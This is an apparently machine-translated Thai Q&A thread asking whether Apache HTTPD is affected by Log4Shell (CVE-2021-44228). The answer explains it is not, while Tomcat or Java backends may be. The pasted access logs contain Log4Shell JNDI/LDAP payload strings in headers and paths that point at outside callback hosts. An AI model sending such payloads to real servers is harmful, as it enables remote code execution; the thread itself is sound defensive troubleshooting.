Apache Webserver ใช้ log4j (CVE-2021-44228) หรือไม่

เว็บเซิร์ฟเวอร์ apache (apache2) ใช้ log4j หรือไม่

ฉันติดตั้ง Apache2 2.4.38 (debian) บน Raspberry Pi OS (64 บิต) และพบบันทึกแปลก ๆ ในบันทึกของฉันเกี่ยวกับ CVE-2021-44228 จาก kryptoslogic-cve-2021-44228.com (หม้อน้ำผึ้ง/เครื่องสแกน), dataastatistics.com (ออฟไลน์ & เป็นอันตราย?) และ a8fvkc.dnslog.cn (ฉันไม่รู้ว่านี่คืออะไร)

สิ่งที่ฉันควรทำตอนนี้?

• ไม่มีอะไรเนื่องจาก apache2 ไม่ได้รับผลกระทบจาก CVE-2021-44228
• ฟอร์แมตทุกอย่างและรอสองสามวันก่อนที่ฉันจะติดตั้งเวอร์ชันแพตช์
• "ตรวจสอบ" ว่ามีไฟล์ .class ใหม่หรือไม่ และหากไม่มีการดำเนินการต่อ (และใช้แพตช์แบบแมนนวล เช่น log4j2.formatMsgNoLookups = จริง
• อื่น ๆ อีก

บันทึก:

139.59.99.80 - - [12/Dec/2021:00:34:47 +0100] "GET / HTTP/1.1" 301 512 "-" "${jndi:ldap://http80useragent.kryptoslogic-cve-2021-44228 .com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:00:34:48 +0100] "GET / HTTP/1.1" 200 5932 "http://79.232.126.49/" "${jndi:ldap://http80useragent. kryptoslogic-cve-2021-44228.com/http80useragent}"
139.59.99.80 - - [12/Dec/2021:01:51:38 +0100] "GET /$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D HTTP/1.1" 301 654 "-" "Kryptos Logic ปากโป้ง"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [12/Dec/2021:01:51:39 +0100] "GET /$%7bjndi:ldap:/http80path.kryptoslogic-cve-2021-44228.com/http80path%7d HTTP/1.1" 404 8456 "http://79.232.126.49/$%7Bjndi:ldap://http80path.kryptoslogic-cve-2021-44228.com/http80path%7D" "Kryptos Logic Telltale"
139.59.99.80 - - [11/Dec/2021:18:35:25 +0100] "GET / HTTP/1.1" 200 5932 "-" "${jndi:ldap://http443useragent.kryptoslogic-cve-2021-44228 .com/http443useragent}"
139.59.99.80 - - [11/Dec/2021:20:13:11 +0100] "GET /$%7Bjndi:ldap://http443path.kryptoslogic-cve-2021-44228.com/http443path%7D HTTP/1.1" 404 8456 "-" "Kryptos Logic ปากโป้ง"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[******โดเมนของฉัน****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[******โดเมนของฉัน****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:33 +0100] "GET /?api=${jndi:ldap://[******โดเมนของฉัน****].774dda06.dataastatistics .com/help} HTTP/1.1" 400 5115 "${jndi:ldap://[*****mydomain****].774dda06.dataastatistics.com/help}" "${jndi:ldap:/ /[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****โดเมนของฉัน** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
191.101.132.152 - - [11/Dec/2021:22:55:34 +0100] "POST /api/v2 HTTP/1.1" 400 5115 "${jndi:ldap://[*****โดเมนของฉัน** **].774dda06.dataastatistics.com/help}" "${jndi:ldap://[*****โดเมนของฉัน****].774dda06.dataastatistics.com/help}"
137.184.106.119 - - [10/Dec/2021:20:38:18 +0100] "GET / HTTP/1.1" 301 568 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:20 +0100] "GET / HTTP/1.1" 200 6576 "-" "${jndi:ldap://a8fvkc.dnslog.cn/a}"
137.184.106.119 - - [10/Dec/2021:20:38:21 +0100] "GET /favicon.ico HTTP/1.1" 200 7103 "-" "${jndi:ldap://a8fvkc.dnslog.cn/ ก}"

Apache เองไม่ได้เขียนด้วย Java และไม่ได้เชื่อมโยงโดยตรงกับไลบรารี Log4j ที่น่าอับอาย ปลอดภัยเป็นพิเศษจากช่องโหว่นี้

มีอะไรผิดพลาดได้อีก?

1. ไม่ใช่ทุกอย่างที่มี Apache ในชื่อและฟังก์ชัน HTTP นั้นถูกต้อง เดอะ เซิร์ฟเวอร์ Apache HTTPDตัวอย่างเช่น Apache Tomcat เป็นเว็บเซิร์ฟเวอร์ HTTP ที่แตกต่างไปจากเดิมอย่างสิ้นเชิง มันเขียนด้วย Java และสามารถกำหนดค่าให้ใช้ Log4J ได้ ฉันไม่แน่ใจจริง ๆ ว่าเป็นไปได้หรือไม่ที่จะเข้าสู่ระบบ Tomcat

คนที่มีประสบการณ์และความรู้น้อยสามารถเข้าใจผิดทั้งสองอย่างได้อย่างสมบูรณ์แบบ และตามความรู้ของฉัน Tomcat มีประวัติความปลอดภัยที่ดีกว่า Apache HTTPD "คลาสสิค"

(ตามความคิดเห็นของ Bob สิ่งอำนวยความสะดวกการบันทึกเริ่มต้นใน Tomcat ไม่ใช่ Log4J)

2. Apache HTTPD สามารถขยายได้มาก สามารถกำหนดค่าให้เรียกสิ่งอื่น ๆ ในพื้นหลังด้วยอินเทอร์เฟซที่หลากหลาย (เช่น เพื่อดึงหน้าเว็บแบบไดนามิกที่สร้างขึ้นโดยโปรแกรม) "สิ่งต่าง ๆ ในพื้นหลัง" เหล่านี้บางส่วนอาจใช้จาวาและเชื่อมโยงกับไลบรารี Log4J

ระยะทางของคุณอาจแตกต่างกันไป โดยเฉพาะอย่างยิ่งหากคุณไม่ทราบรายละเอียดชุดซอฟต์แวร์ของคุณ

เพื่อให้แน่ใจ คุณควรตรวจสอบก่อนว่าคุณได้ติดตั้งเครื่อง Java ไว้หรือไม่ ในตัวจัดการแพ็คเกจของคุณ แพ็คเกจนั้นจะถูกเรียกว่า JRE-something, JVM-something หรืออาจจะเป็น JAVA-something

คุณอาจลอง:

จาวา - เวอร์ชัน

ในเปลือกของคุณ

หากคุณไม่มีสิ่งเหล่านี้และคุณไม่ได้ติดตั้ง JAVA นอกตัวจัดการแพ็คเกจของคุณ คุณก็ปลอดภัย

โดยทั่วไปไม่ปลอดภัย แต่อย่างน้อยก็ปลอดภัยต่อ CVE-2021-44228